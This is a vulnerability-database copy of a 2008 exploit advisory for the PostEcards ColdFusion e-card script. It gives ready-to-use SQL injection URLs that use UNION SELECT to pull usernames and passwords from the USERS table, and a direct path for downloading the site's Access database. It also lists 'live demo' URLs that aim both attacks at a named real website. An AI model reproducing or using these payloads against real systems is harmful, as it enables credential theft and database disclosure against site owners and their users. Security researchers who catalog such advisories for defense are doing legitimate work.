Lucene search

PostEcards SQL Injection / Database Disclosure

🗓️ 09 Dec 2008 00:00:00Reported by AlpHaNiXType

packetstorm🔗 packetstormsecurity.com👁 15 Views

PostEcards SQL Injection / Database Disclosure. Vulnerability in PostEcards allows SQL injection to disclose the database file exposing user informatio

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`###########################################################################  
#-------------------------------AlpHaNiX----------------------------------#  
###########################################################################  
  
#Found By : AlpHaNiX  
#website : www.offensivetrack.org  
#contact : AlpHa[AT]HACKER[DOT]BZ  
  
###########################################################################  
  
#script : PostEcards  
#download : http://www.funscripts.net/old_coldfusion/download.php?fname=postcards  
  
###########################################################################  
  
#Exploits :  
  
--=[SQL INJECTION]=--  
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00  
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,pwd,null%20FROM%20USERS%00  
  
  
--=[DATABASE DISCLOSURE]=--  
http://www.target.com/database/postcards.mdb  
  
  
  
#Live Demo  
http://www.melink.com/PostCards/database/postcards.mdb  
http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00  
  
#Greetz For  
  
###########################################################################  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

09 Dec 2008 00:00Current

7.4High risk

Vulners AI Score7.4